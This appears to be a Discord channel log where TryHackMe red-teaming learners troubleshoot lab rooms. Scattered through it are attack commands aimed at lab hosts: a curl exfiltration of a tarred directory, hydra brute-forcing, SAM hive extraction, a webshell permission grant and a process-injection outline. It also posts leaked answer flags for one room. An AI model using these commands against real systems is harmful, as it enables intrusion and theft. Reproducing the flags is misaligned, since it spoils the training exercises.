#red-teaming-path
I installed openjdk-17-jdk
I am also on Intro to C2 and armitage used openJDK11 for me
try sudo apt install openjdk-11-jdk
Time to go back-in-time
Will give it a try. Ty
Side question. The original Armitage repo has not been touched for 7 years. I am curious if this, or at least this fork, is still a thing.
Yes. Is it used professionally, commonly?
I tried that but it did not start. Then, I think there was an issue with a headless version and missing a shared library. So each path had its own peril.
yeah for me it was the openjdk-11
I've got an issue with a library missing during the build
after the sudo apt install openjdk-11-jdk it was working well
what version of gradle are you using in gradle-wrapper.properties?
I think I have lingering java issues. trying to clear it out
I don't have this file because I have done the install with the apt install
I didn't use the git repo
Trying to paste an image but I can't
That is what I have for java now
jdk search
I am now going to delete the clone, and clone again
bingo
the issue? too many javas lingering and kicking around. A complete purge using dpkg and re-clone, and rebuild, worked. Thanks for the guidance.
Nice!
suggest that the task leave a note about prerequisites - namely the java version
Now my question about the C2 server in this path: are the server and the client on the same machine? Because if I launch from my own Kali Linux, what's the point of using armitage?
I think I am going to have to spend more quality time before I can answer that question. But my guess is that it's really a front end for metasploit, and other team members could use this through the teamserver.
But it's a guess at this stage.
Next step, talking to postgresql
yeah but is the teamserver running on the same machine? For me it should be a teamserver on one machine and we use armitage on our local machine to connect to the server. It's just that when I am reading the task it seems to be on the same machine.
Correct. But for the purpose of the lesson they keep it on loopback so you are not exposing something. Or at least that is my theory
But of course, loopback does not work on purpose. So it has to be on an external facing IP .
Hello, I cant solve this "Once the DNS configuration works fine, resolve the flag.thm.com domain name. What is the IP address? " at Data Exfiltration Task 8
Please somebody help me. I have been trying for like 2 hours and I can't get the answer, even though I've already done what the task said
Is this bugged or something ?
Nevermind I got the answer.
hahahahah The answer is not the solution to your question; solve hard problems to build up problem-solving skills, brother
not like this. I just tried on the room's machine and I got the answer
Hello,
Room: https://tryhackme.com/room/windowslocalpersistence
Task: 4
Section: Creating Backdoor Services
"You can then copy the executable to your target system, say in C:\Windows and point the service's binPath to it."
How do I copy a file from my base machine (linux) to windows?
Tried scp but getting a connection refused
hello everyone
the link for the redteam room doesn't work for task 9, can someone help me please?
the room is weaponization
the website for darksource doesn't work
Someone knows a similar site ?
Hi everybody, I need help for the redteam room password attacks task 7, can you help me please?
[9:40 PM]
when I use hydra, the same error is displayed
[9:41 PM]
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized
[9:41 PM]
I don't understand for what
[9:41 PM]
for why sorry
https://tryhackme.com/room/passwordattacks
Task 8
Logged into FTP but no flag :C
Same LOL
Could you show a screenshot ?
Task 7 ?
Okay, but you do see that there is a directory, right ?
wait
no way this dirs name is "files"
I thought it was just ftp gibberish
bruh
thanks ! @native berry
Gave +1 Rep to @native berry
on room https://tryhackme.com/room/passwordattacks
task 8, on the brute force question, why doesn't this payload work?
the text "Login failed" does appear on the page, and the password is indeed inside the wordlist
Okay, upon further investigation it seems like that the correct credentials also lead to the page with the "Login failed" text, and then redirects to the correct page, extremely odd.
Hello, I'm using evil-winrm but it keeps timing out randomly. Like I can connect and get a reverse shell, but after a short time it always times out. An error of type Errno::ETIMEDOUT happened, message is Operation timed out - Operation timed out - connect(2) for "10.10.10.161" port 5985 (10.10.10.161:5985)
Error: Exiting with code 1
why do I always get an error when I want to start armitage?
database connection refused
but it is running
Is this on a local box or an attackbox?
Hello, is there any Red Teamer here?
Plenty, just ask your question.
I wanna just have a deep chat about CyberSec
Could I message you privately to have a deep chat?
or here if you like
If you post here, then more than myself can answer.
alright
first of all, we know that a Red Teamer is a person who acts as a hacker
to help the blue team do their job
but we understand that no one is perfect, so no one could hack everything on their own
so of course there are people specialising in many different fields
regarding PCs (computers, laptops) and mobiles, what are the fields inside them?
because I wanna know what I wanna be a specialist in
I hope I am clear
a person has mentioned that there's a field called hardware
from what i get from your question is, you are looking to work in a team where each member plays a certain role. and you want to know what those possible roles are so that you can begin specialising in one of them and then find a team who needs that specialisation
precisely, I wanna know what I am going for
Red Teaming is a wide thing
it's not about hacking a particular thing
and no one could hack everything
I wanna know what the fields are for PCs (computers, laptops) and mobiles
for example
web hacking
has
Web API
bug bounty API
understood, I'm not at a point where I could offer an answer to you, but I'm definitely interested in following any input from red teamers on here also
it's like a field inside it
the same goes for PCs and mobiles
hardware
apps
...etc
I wanna know ( ... etc )
because everyone uses the word ( etc ) to refer that there are more things
alright, I wanna know the more things
to find what I exactly wanna do
I tried to google it but found nothing
Hey, Muhammad! Great to meet you! Pentesting / offsec has a TON of specialties. Do you mind telling me more about what you want to hack on pc's and phones? For instance, there's hardware, application, protocol, internal/external network testing, etc.
that's an answer I got from someone in the industry yesterday and I asked about the other examples that he didn't type and used the word "etc" instead because as far as I remember, he told me that he doesn't recall the others now but there are more.
etc could refer to SCADA pentesting and IOT pentesting
Thanks mate
Gave +1 Rep to @paper gale
On room https://tryhackme.com/room/windowslocalpersistence
Task 6
I followed all of the instructions, I logged out and back in and received a shell successfully, however I am not able to get the flag
whoops found the issue
If you are reusing payloads, chances are that you are getting a connection back from one of the previous backdoors you planted on the machine. If you restart the machine, it will work for sure
I actually put it in the startup folder of a specific user instead of the global one
Glad it works now!
can any one give a hint how to find flag16
i tried everything to get the shell.aspx on windows but is not working
If you are getting some sort of access denied error, you need to grant permission to the IIS user to read and execute the file. The easier way to do so is by running icacls <path_to_shell.aspx> /grant Everyone:F
What is white cards?
WindowsLocalPersistence-Task2-RID Hijacking. I have edited the SAM entry for user 3F2, and made the RID change to 500. When I RDP with xfreerdp or remmina, the desktop just continues to flash and never settles down. Anyone see this and have a solution? (Note if I go back to the Administrator account, the issues also presents itself)
Hello guys, I am doing from the Data Exfiltration room the Task 6, and in HTTP Data Exfiltration task I have this problem:
When I type this: "curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php" in thm@victim1, this error appears: "curl: (7) Failed to connect to web.thm.com port 80: Connection refused". Can you please help me?
Thanks a lot.
Can somebody tell me whether ACLs / DACLs/SACLs are specified by the DC per host basis or are they host based?
Or both lol I dunno
Weaponization room
keeps disconnecting me
xfreerdp
was working fine for a bit
damn I guess this room gets 0 attention
It does get attention.
Did you try remmina already?
Can anyone help with windows local persistence?
You're best off asking your question straight away; that way you will more likely get a reply
Reset solved everything.
It's more of a bug i guess.. I cannot get the flag for Task 5 Abusing Scheduled Tasks.
Getting the reverse shell is no problem, but even NT Authority/System can't get to flag9
It's not just about getting a shell as System, these exe binaries are checking if certain conditions are met to give you the flag
So make sure you name your scheduled task exactly as mentioned in the task
Did you solve it?
Hello there, while going through the online password attacks room I have encountered the following issue. There is a task where you have to crack an SMTP server. But while I was cracking it with hydra I got the following error:
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 503 5.5.1 Error: authentication not enabled
Any ideas why do I get the following error and what can I do to solve this or this is an issue with the room?
I'm also having the same error
ugh I don't wanna have to use the attackbox for these tiny things
Best to provide the full command you used
Or even better a screenshot thereof
You'll have to verify in order to send screenshots
!docs verify
It would also be helpful to see the output above, so if you could not cut the screenshot so much, that would be appreciated
Don't specify the port in the IP, hydra is doing that on its own
I get the same result
cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/
The official website of Elite Medical
is what I use for generating the initial wordlist
then with john I generate the wordlist with the rule that there is a symbol in front of the word and two numbers 0-9 after
What about specifying the IP and service like this: 10.10.114.128 smtp ?
same result again sadly
Did you restart the target machine already?
I am having a problem related to a question on this path. The question was: which nmap option do you use in order to specify 162 as the source port while scanning for host discovery? I answered the question by submitting "-g 162" but the answer was wrong. I searched on Google but in vain. Is there someone who can help me with that? Thanks in advance
No not yet
I'll restart it now and try again
exact same error message after restarting
man
Mh, have to go to the dentist now, will look into it later, in case you haven't figured it out already
I tried this task again for you and yes I got the errors even after 2 restarts, but after my 3rd one it goes like it should - even an nmap scan shows open ports on 25. So restart it and try it again
I used the Name, but will triple-check again now. Thanks for the answer
Gave +1 Rep to @native berry
just do the complete explanation of task 5 and you will get the result
Ah
Check nmap docs bruh
i have the same problem you had some time ago
"SAM hashes extraction failed: 'NoneType' object is not subscriptable"
reinstalling impacket did not solve it, did you find a different solution?
Troubleshoot: did you check GitHub as was stated above my message? There are a lot of different issues that could cause it, and I have no idea what OS you are running. I am now running an Arch install with the tools I need when I need them; I don't recall what I checked.
This is basically the chall in one picture:
top right: two commands with 'schtasks' (maybe someone spots a mistake here), then
bottom right: the psexec to make it disappear. That it has disappeared you can see in the top right, the last 'schtasks' command.
top left: you can see, I get the connection with netcat and can't get the flag.
I think I found something: I deleted all security descriptors instead of just thm-taskbackdoor. I hope that fixes it.
oh yes that could fix it
how is it?
did not fix it
"Sorry! You are still missing something. No flag for you yet. (11)"
but it changed from (12) to (11)
oh, sorry it worked now! I misspelled the task this time, but now all works. But hell, this room is evil
Anyone know how to fix this?
Stack Overflow?
I'm trying to search it up
struggling to find it
searching it up was the first thing I did
i can see similar issues
Windows Persistence lab btw
!vpnscript
try this just to check it is not your connection being iffy
everything seems fine
this time I connected instantly
the script must've done something
ty
or confirmation bias ¯\_(ツ)_/¯
After quite some time of trying to download the files through winrm
still doesn't work after restarting
definitely an issue with my impacket
I'll try attackbox
Did you update your impacket version?
yes I reinstalled it
ok, then let us know if you get the result with attackbox
I will, ty
with attackbox I'm getting this error
I guess impacket isn't fully installed on this
tried a different script
still can't get it
could you give me the task-name? I will redo it on my own
I know that, but the persistence I find is in AD - is that right?
I found it
Windows Local Persistence
yh
do you have a stable evil-connection on attackbox now?
with user thmuser1
check whoami /groups with this account and check Backup Operators
fine I go deeper and test more
`Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[-] ("Unpacked data doesn't match constant value 'b''' should be ''regf''", 'When unpacking field 'Magic | "regf | b''[:4]'')
[*] Cleaning up... `
try python3 instead of python3.9 or python3.10
I guess there are some issues with your 2 bak-files
it worked for me like a charm
I will try it with the newest version of secretsdump.py from github
also fine
Fuck
I'll try again
It finally worked after restarting the target for the fifth time
ty
In the Sandbox evasion room, I'm having trouble compiling the given dropper for task 3. Anybody have any suggestions?
What does /e:VBScript do when running wscript?
how do we connect to the BreachingAD login bruteforce page?
I can't access the page on both attackbox and kali
I have configured the breachingAD.ovpn file
what's wrong??
Heyo! From what I understand, I believe it tells wscript to execute the file as a VBScript/.vbs file even if it's not (a .txt for example)
I just started the red teaming path and remember seeing this last night when it was mentioning how you don't necessarily need to rename the file extension to vbs to run it
Thank you for this response, it clears a lot up
Heyy guys... I was wondering why I can't have my gobuster scan find the "wp-login" page on Mr. Robot machine even if the wordlist is the same as in the walkthrough ... Is there anyone who can help me?
can someone please vote for a Lateral Movement and Pivoting reset?
You should state which subnet you're in.
There are multiple instances.
10.200.19.X
I had the exact same problem as you and I agree, this is quite a jump for someone to make. The verbiage in the "room" states "...during the enumeration, we found that the webserver serves logout.php" but there is no explanation as to how "logout.php" was found. I ran DirB with the "-X php" parameter against http://10.10.x.x/login-get using several different wordlists but "logout.php" still was not discovered.
Maybe the lesson is simply stating that at some point during our imaginary Red Team engagement we noticed "logout.php" while enumerating something and made note of it. IDK
can anyone help with this https://www.tryhackme.com/room/signatureevasion#, task2 round to the nearest kibibyte.
The phrasing is a bit unlike, just round to the 1000
1 kibibyte = 1024 bytes
Thank you Hackshell, still confused, the number that I am trying to round is 50500 how does it get to 1024 bytes?
just think up or down to 1000 --> 51000 or 50000
Got it, Thank you very much! Hackshell
I need help on the Windows Local Persistence Task 2 - downloading the SYSTEM and SAM hives. When I use my own Kali box, evil-winrm does not seem to work when using "download system.bak" and "download sam.bak". The evil-winrm version is 3.4. When I used the attack box (which is running evil-winrm v2.4) it seemed to work perfectly fine. Can anyone help with this discrepancy?
try downloading the bak files again. I had this issue with these files too. If it isn't working anyway let me know.
Or just try the attack with your machine with the already known hash.
I have actually tried multiple times. It still does not work, though it works perfectly fine on the attack box..
Looks like it may be an issue with OpenSSL. Is it your personal Kali instance or a THM Kali instance?
Same issue is reported in the following Reddit post (for Fedora, but someone reports having the issue with Kali), a solution listed in there.
I recall having a similar issue previously on Kali and it was resolved with a reboot luckily
it's a personal VM. Yeah I tried a reboot, but no go. It was after an update/upgrade. Thanks for the link my man!
Ah yeah that'll likely be it then. It talks about OpenSSL 3 legacy providers, so something likely got upgraded that's borked bind-utils
I fear I fudged something else up. Is there a way I can just get a copy of the default /etc/ssl/openssl.cnf and start from square one?
I can still ping and whois
super strange
of course there's a default in the same spot
just removed the jammed-up one, cp'd the default, made the changes suggested, and it works like a charm. thanks
I was there
*Evil-WinRM* PS C:\flags> flag1.exe
The term 'flag1.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ flag1.exe
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (flag1.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\flags>
Oh wait

Did you check your permissions with -- whoami /groups --?
After adding the key 1 in the registry you have to relog with evil-winrm. Then you should have all necessary permissions, and then and only then you create your two bak-files.
Let me give it another try. ...
Evil-WinRM download
With Evil-WinRM, if you are trying to download a file. Don't forget to add full paths for both remote and local machines. It might help A LOT.
Do this...
C:\Users\UserName> download C:\Temp\MyFile.txt /home/kali/Downloads/MyFile.txt
Instead of ...
C:\Users\UserName> download MyFile.txt MyFile.txt
Because it might show ''Download successful'' but you won't actually download anything
Enjoy
Try: .\flag1.exe
Good idea. Thx! Much appreciated.
I'll try that later today.
Hey hey, I'm currently working on Task 8 in Windows Local Persistence and it's saying to download an ASP.NET webshell but the machine has no internet access. Tried using wget on a webshell made in msfvenom on the AttackBox but the machine can't reach out anywhere, anyone run into this issue?
Hi, https://tryhackme.com/room/livingofftheland - task4 - does anyone know what should be downloaded to make the flag appear on the Windows desktop (I've tried multiple different files: txt, exe, ps1, and also with multiple VM starts/terminations, but nothing works)?
I have tried it and works. Thanks for the pointer.
Gave +1 Rep to @zinc coyote
Hey, you can download it on your machine and copy the code via the clipboard on the in-browser machine
In the section of Breaching Active Directory Task 8 LDAP, the link to the printer page http://printer.za.tryhackme.com/settings.aspx is not working
I tried downloading the file to my PC and copying it over but the clipboard functionality doesn't work for me, is there any other solution?
(Just for context I mean I can't get the webshell[.]aspx file into the 'wpersistence' machine, the AttackBox clipboard works fine)
I'd say the easiest way is to connect to WPERSISTENCE via RDP and copy it directly. It should work with RDP clients like Remmina or xfreerdp
You can do so with the credentials provided on task 2
If none of that works, you can use smbserver.py -smb2support -username Administrator -password Password321 public . to mount a shared folder from your kali or attackbox which you can then access from the file explorer on the WPERSISTENCE machine by pointing to \\YOUR_KALI_IP\public\
be sure to run the command from a folder that only contains your webshell so you don't accidentally share any important files
Ahhh got it! Thank you for your help!
Gave +1 Rep to @echo ore
I really enjoyed #red-teaming-path
Yeah, that could be the case. I was just trying to get through the red team path tbh. While the path got me some good experience with tools and such, I finally got a job as a pentester and I have a completely new toolset
Now I'm working through PortSwigger Web Security Academy and learning how to use Burp Suite better. I wish I would have learned about this resource earlier, PortSwigger is hands down the best free online course for learning web vulnerabilities. When I was searching for pentest gigs I noticed the market is looking for webapp testers mostly. If you're looking to break into pentesting I would recommend spending your time on portswigger and learning burp, as it's likely the path of least resistance.
There probably are red team openings or network pentest openings, but most of them are looking for pentest experience.
I know this isn't really related to the red team path, sorry guys, but anyone doing this path hoping to break into pentesting will hopefully find some value in this comment.
Hi all, I am having trouble with Data Exfiltration Task 10 establishing the tunnel. I think the issue is with my DNS A and NS records. I have followed instructions exactly and am using the THM AttackBox. I fail when I try to establish the ssh session to 10.1.1.2 as per the instructions, the connection times out. Can anyone assist with the correct domain and values for the A and NS records I should be using to confirm I have these configured correctly please? Also, do I need to update the netplan.yaml settings for task 10 as per the instructions in task 8? Many thanks in advance.
What's the difference between?
--mtu
and
--data-length
In nmap? As far as I can tell you can achieve the same result with these. IP Header will always be 20 bytes and the rest of the data has to be a multiple of 8
--data-length <number> (Append random data to sent packets)
Normally Nmap sends minimalist packets containing only a header. So its TCP packets are generally 40 bytes and ICMP echo requests are just 28. Some UDP ports and IP protocols get a custom payload by default. This option tells Nmap to append the given number of random bytes to most of the packets it sends, and not to use any protocol-specific payloads. (Use --data-length 0 for no random or protocol-specific payloads. OS detection (-O) packets are not affected because accuracy there requires probe consistency, but most pinging and portscan packets support this. It slows things down a little, but can make a scan slightly less conspicuous.
https://nmap.org/book/man-bypass-firewalls-ids.html
(. . .)You can set the length of data carried within the IP packet using
--data-length VALUE. Again, remember that the length should be a multiple of 8.
End of task4 https://tryhackme.com/room/redteamfirewalls
While the nmap docs specify that --mtu requires you to use a value that's a multiple of 8, with which the task writer agrees, in the case of --data-length the docs and the task author seem to disagree (?)
@empty sleet is there a reason it's a multiple of 8?
I know other people have had problems with task 2 in the signature evasion room with transferring the shell.exe file to the Linux machine, and so far the answers I've seen for that problem have not really solved the problem, so to save you guys the headache, you're better off just watching a walkthrough on YouTube. I don't know who made this room, but geez. That's 2 hours of my life I will never get back.
--data-length will add random data at the end of the packet instead of just sending the bare headers of the packet. The idea here is to trick any network security device into thinking the packet is part of some ongoing communication and has a content, which might be less suspicious than header-only packets.
--mtu is about packet fragmentation. Nmap will cut your packet into smaller ones and send fragmented packets over the network. The idea here is that if your network security device (IPS, FW, etc) can't handle fragmentation well, packets might pass through it without being properly checked, and be received and reassembled by the end host.
hopefully that helps
Clears a bit up but I'm still in the dark with this.
Edit: Read the message below lul
(Append random data to sent packets)
Normally Nmap sends minimalist packets containing only a header. So its TCP packets are generally 40 bytes and ICMP echo requests are just 28.
That's from the docs.
So I guess your message clears that part of my question, thanks !
However
Does --data-length require the supplied value to be a multiple of 8?
Nmap docs don't specify it but the author of the task claims that it has to be 8.
Maybe I'm missing something obvious here and, say, a (IP header) 20+12 byte packet won't be processed correctly at all
Gave +1 Rep to @echo ore
Just tested this quickly and --data-length takes values that aren't multiples of 8. For example nmap 10.13.0.1 -p 22 --data-length 123 works and generates a packet with a TCP payload (for a TCP scan) of 123 bytes
Thanks haha !
I know I could've done this myself but with stuff like this I prefer that people with more experience test it.
Gave +1 Rep to @echo ore
Also, somebody has got to update the task
I'll make sure to forward this so that it gets checked
Hey, could someone help me with a task in windows internals?
I can't find the stack argument in the task threads.
@brisk path
BRUUUUUUUUUUUUUUUH
Either something's fucking wrong again with my solution OR it's on you guys
eh, just gonna move the .sln and other stuff to my kali VM for future use
aight seems like pinging THM staff members is allowed
@echo ore ; -;
Need a pastebin with the code / the whole project?
aight, zipping the repo and exfiltrating it
Thank god for 7zip
Also how's that thing :D?
Hey, haven't done the room myself, so I'm not really sure, however the error is telling you the sleepCheck variable is being used without initialization. This may get solved if you assign a value to it where you defined it.
This will be checked soon for sure
Dude
I didn't assign it
It's "your" .exe
provided in your vm to get the flag
Aight :D
and I've implemented the sleep function as shown in the task :)
(And for future reference. yes I added the required lib in the linker options, without it the thing doesn't compile anyway LOL)
@brisk path any ideas?
I can share the .cpp I compiled. Gonna wait for your response + I don't wanna send a potential answer here
If this is also a mistake I'm gonna have a good time ngl
There is an error in your implementation of the sleep function. I would suggest re-reading the instructions and your solution.
Aight, but could you explain why your .exe crashes like this?
And as you can see every check up to this one here is passed
and yes I have included windows.h and iostream
and like I've said, solution compiles fine no errors no nothing
unless freaking 65000ms is too much for the check although it crashes even before the 1minute mark is complete
Omfg. Alright it seems like this version of my code didn't have the quadruple slashes
for fucks sake. Sorry my bad my bad!!
Aight, but can you point me to somewhere so I can understand why this occurs?
it sounds really bizarre
aw man still no dice
https://pastebin.com/siMHZuLW
Dunno, I'm so done with this. Why I am receiving a warning from xstring is beyond me
Edit: And yes I used the "using namespace std;" may I burn in hell etc. etc.
Nice pfp
lul
insert identification joke here
Abusing windows internals is really challenging for me to wrap my head around
Do you guys recommend some c++ tutorials to make that module more clear?
Basic knowledge of programming in C++ / programming in general is enough. What might be more difficult for you is the WinAPI itself. Personally I just read some stuff about the most commonly used ones in binary exploitation etc. made a cheatsheet and some templates.
Guided Hacking on YT might be of help.
yeah, it's a lot of information
Remembering Windows-specific data types will come with practice. The channel I've mentioned above has a really good video about how memory works in general and in context relevant to windows and API.
- Get the Proc handle
- Getting a handle of a thread / module
- Overwriting VirtualProtectEx, saving the old one
- Allocating memory for your payload
- Making space for the payload in the target process (widely depends on the technique)
- Writing your payload to that freed space
- Triggering the payload
That is the rough overview of how process injection works. If somebody's got a better one please share it!
This might be slightly in the blackhat area but writing cheats for games largely depends on WinAPI. Might be of use to you, might not.
do you think you can abuse the Win API with golang or any other compiled language, or is C++ the best option?
You could probably even get away with some wack stuff like Python to C++ but honestly, C++ is the best option
Edit: By Python to C++ I meant Cython
https://github.com/rootm0s/Injectors/tree/master/injectAllTheThings
This is a pretty neat repo
for education
saved it
Finished my first room today!
Question: I noticed a few rooms have limited access, in some cases a few days. Can I finish the red-teaming-path?
You will need to rejoin the room after it, but that's all. Your progress on the rooms won't be affected and you can finish the room from where you left it.
Hey,
For this room https://tryhackme.com/room/obfuscationprinciples task8
What env can I use to compile c++ files?
anyone have an issue in the red-teaming-path /lateral movement pivoting/ pass the hash with the mimikatz.exe suddenly disappearing after using it?
Anyone know of any issues with the VM in Weaponization room with the Red Teaming Path?
Can't ping it and the RDP is crapping out
Hello hello, I'm doing task 7 on local persistence and I can't trigger the sticky keys shortcut, I have tried everything but no results
Am I doing it the wrong way or is it a bug?
hmm shadow could try
Anyone know how to edit an inf file in evil-winrm PS?
Here is a screenshot. I think there is a step missing:
If anyone could suggest how to modify this inf file inside PS within evil-winrm, it would be appreciated....
Cricket....cricket!!!
Anyone in here???
well you do not need to edit it from evil-winrm
after all they give you access to an admin account that lets you edit said files
The instruction to teach this is conspicuously absent
the first 20 or so lines of task 2 tell you the info to log in as admin on the box
My evil-winrm login is admin
then the instructions start for this under: Special Privileges and Security Descriptors
yes but you are supposed to use rdp with the normal admin account and not the evil-winrm
as this is for flag 2 and not flag 1
There is no mention of this...in the room, so far...perhaps that should be added.
got it...with the GUI....thanks
Hi guys, I have a question for the room https://tryhackme.com/room/passwordattacks, task 8, question no. 2. I want to generate the dictionary using rules that I already set. From the pictures it seems it was successfully processed, but where were the files created? thx
Nowhere, because you are piping the output to wc instead of redirecting it to a file
Hello I have a question about the room abusing windows internals task 4 I have solved by trying. But why is it working with explorer.exe and the previous tasks with dllhost.exe
Hi @native berry thanks for replying. anyway in john, what operator should i use to pipe it to a file?
Gave +1 Rep to @native berry
There is a difference in using a redirect operator or a pipe; if you google that difference it should lead you to your answer
haha i am laughing to my self. sudo john --wordlist=clinic.lst --stdout --rules=THM > dicnew.txt solve my problem
Anyone else having issues with Windows Local Persistence in the Red Teaming Path, Task 4?
I can create the service but cannot start it... getting error 1053. Even tried starting from GUI... no joy!
Can you send some screenshots? I might be able to help
Thank you..I will grab a screengrab, next time I am in there. and post it here
@echo ore Here it is:
I can create the service but I cannot start it.
This is an issue with the VM. Can an administrator look into this please?
I created this service with the administrator account.
If I remember correctly this might be working actually. Did you check if the Administrator's password changed afterwards?
The reason you get that error is because you are executing a binary that is not supposed to be used as a service (net). What will happen is that the Service Control Manager will run the command and expect it to report something as any service would (service executables have a couple of special functions inside to talk to the SCM, but your command doesn't), and kill the process afterwards as it doesn't get a timely response. The command does get executed, however.
Hello red team, so I have a question. I posted this on Reddit and got different answers so let's see what yours are. Is it possible to hack into a computer and overheat it to the point the battery catches on fire?
Throwing this out there in case someone gets stuck and searches for this. I knew how to fix it based on when I did the OSCP but I think it might be confusing for others.
Here's the question:
When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?
To do this on your own Kali VM rather than the attack box, do this:
- Open /etc/proxychains4.conf with a text editor of your choice.
- Edit the socks5 settings at the bottom to match this (screenshot 1): socks5 127.0.0.1 1080
- Prepend your curl command with proxychains: proxychains curl http://flag.thm.com/flag
I hope that helps if someone gets stuck and searches for the question on Discord. Happy hacking
To my knowledge no, it is not possible
If you were to overclock the CPU it would not catch fire
Or the batter
hey guys quick question in the Red Team Threat Intel Mod task 7 I'm a little confused in what its wanting me todo. Is it wanting me to just compare the APT 41 model to the test site they have me launch in that task or am I supposed to come up with my own?
has anyone tried solving the Exploiting AD network using only powerview without Bloodhound since it's a very noisy tool and not to be used on a red team
Hey everyone,
I am stuck at Online Passwords Attack task when trying to bruteforce SMTP with Hydra.
I input this command as it is asked :
hydra -l pittman@clinic.thmredteam.com -P password.lst smtp://10.10.48.88:25
and i get this when starting to bruteforce :
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized
Any ideas ?
Hey there.
I just checked it myself, there might be an issue, so just try smtps meanwhile.
In case there is indeed an issue, I will forward it.
Hey all --
I am doing this room in the red team path:
https://tryhackme.com/room/avevasionshellcode
Here's the question:
What is the Magic number value of the thm-intro2PE.exe file (in Hex)?
Here's the value from PE-bear:
But 4D5A is not the right answer?
Even ChatGPT tells me that is the answer!
magic numbers might be longer than 2 bytes. try checking online for a list of well-known magic numbers and compare against the one you got.
But the answer syntax shows 4 hex numbers which would be 2 bytes?
"little-endian" and "big-endian", but don't ask me more about that
Ah! I got you. Thank you!
Gave +1 Rep to @native berry
In the signature evasion room @ https://tryhackme.com/room/signatureevasion task 2
I split the file into 2 and moved them onto the machine, but it doesn't seem to trigger Windows Defender
Anyone?
How did you fix it?
are the red teaming path tickets still a thing or have they been discontinued?
The latter.
Hi!
Who was able to get the flag in the end?
[Evading Logging and Monitoring]
Task 10 Real world scenario
There must be 3 conditions met:
1-Disable logging where needed
2-Maintain environment integrity
3-Clean our tracks
What is missing, because it seems like all the conditions have been met.
But when the agent is started, the logs continue to be kept.
Any suggestions, hints, ideas?)
Hi, I am stuck in Signature Evastion room (task 2). If anyone could provide some steps on how to solve question 2 on task 2 then that would be very helpful. Basically, the question is, "
To the nearest kibibyte, what is the first detected byte?"
Done!
I am also looking for some help exactly in this scenario, for a long time.
Python question: I'm now in the Breaching Active Directory room. The passwordsprayer.py is giving errors; the syntax is right. When I'm using a Python script on my own Kali boxes it frequently gives errors. Is there a method to fix this?
I'm getting this weird error while Brute-forcing Pittman@clinic.thmreadteam.com in Module Password attacks
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized
Use smtps, this should be changed in the room soon.
Kk
Hey guys,
can you help resetting this network https://tryhackme.com/room/exploitingad
I can't connect to it
i was able to connect until it stopped
For exploitingad task 5
The only way to get kdbx password is with keylogger?
https://tryhackme.com/room/exploitingad
Evening, I am on the data exfil room and task 6. I'm having issues getting the neo-regeorg to work. I get failled to connect to 127.0.0.1 when I send the command it specifies in the lessons.
I have got it to successfully setup the tunnel, however, I am now getting an empty response from the curl and it tells me ERROR, that there is a fail message and it is shutting down. I read in the forum someone else had a problem and stripping the port number off of the machine they were trying to get to fixed it but that hasn't fixed mine sadly.
Hey everyone, can anyone give some hints for this room?
[Evading Logging and Monitoring]
Task 10 Real world scenario
Being stuck too, any suggestions?
I just think agent.exe is broken: even with no log from powershell in the eventvwr, agent.exe is still saying binary leaked
when you use the -l flag, you must only specify the username. There is no need to specify the hostname or IP address.
Ok I'll try that
Hello
I am constantly having an issue to start a service which has successfully been created
Any idea what is causing this?
Windows local persistence
Services
Anyone know why I cannot do a ZONE transfer on task 9, layoftheland?
```
PS C:\Users\kkidd> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix . : eu-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::54f4:a9ed:a215:b119%9
IPv4 Address. . . . . . . . . . . : 10.10.90.28
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.0.1
PS C:\Users\kkidd> nslookup
Default Server: ip-10-0-0-2.eu-west-1.compute.internal
Address: 10.0.0.2
> server 10.10.90.28
Default Server: ip-10-10-90-28.eu-west-1.compute.internal
Address: 10.10.90.28
> ls -d thmreadteam.com
[ip-10-10-90-28.eu-west-1.compute.internal]
*** Can't list domain thmreadteam.com: Non-existent domain
The DNS server refused to transfer the zone thmreadteam.com to your computer. If this
is incorrect, check the zone transfer security settings for thmreadteam.com on the DNS
server at IP address 10.10.90.28.
> nslookup
Server: ip-10-10-90-28.eu-west-1.compute.internal
Address: 10.10.90.28
```
weird.
Reboot fixed the issue.
You were using the wrong name. It's thmredteam, not thmreadteam. @red oasis
It seems the rev-svc.exe might not be in c:\windows as expected
Did you get any update on why "login failed" wouldn't work?
I hope this isn't too much of a spoiler, but the "Runtime Detection Evasion" room is broken. Following the steps does not generate the flags consistently, it often takes multiple restarts of the room, and even then the flags are not consistent. This was noted on the forums multiple times as well as here on Discord.
If anyone else is stuck simply because the flags do not generate, the flags are below to save you time. Once again, I hope this isn't a spoiler -- the room is really straightforward and otherwise helpful and I encourage you to still work your way through it; the lack of consistency with the flags is just a tad bit frustrating
||Powershell Downgrade (Task 5)
THM{p0w3r5h3ll_d0wn6r4d3!}
Powershell Reflection (Task 6)
THM{r3fl3c7_4ll_7h3_7h1n65}
Patching AMSI (Task 7)
THM{p47ch1n6_15n7_ju57_f0r_7h3_600d_6uy5}||
room: data exfil | I'm getting an empty reply from server, what did I do wrong?
Hey, does somebody know if it is possible to get the Virtual Machines used in the active directory module?
THM don't give out any of their machines.
I'll raise the topic again!)
Who still managed to capture the flag for this task, guys?!
Hello! I'm doing the Introduction to Windows API room, is there a way to get the complete code?
I think you are forwarding about.html in port 80 to about.html in port 80. If I'm not mistaken the proxy will try accessing about.html in infinite recursion.
You still have recursion on that. When you are trying to access /about.html, that is still under /, so instead of loading the file, your server will try to proxy it to http://localhost:80/about.htmlabout.html.
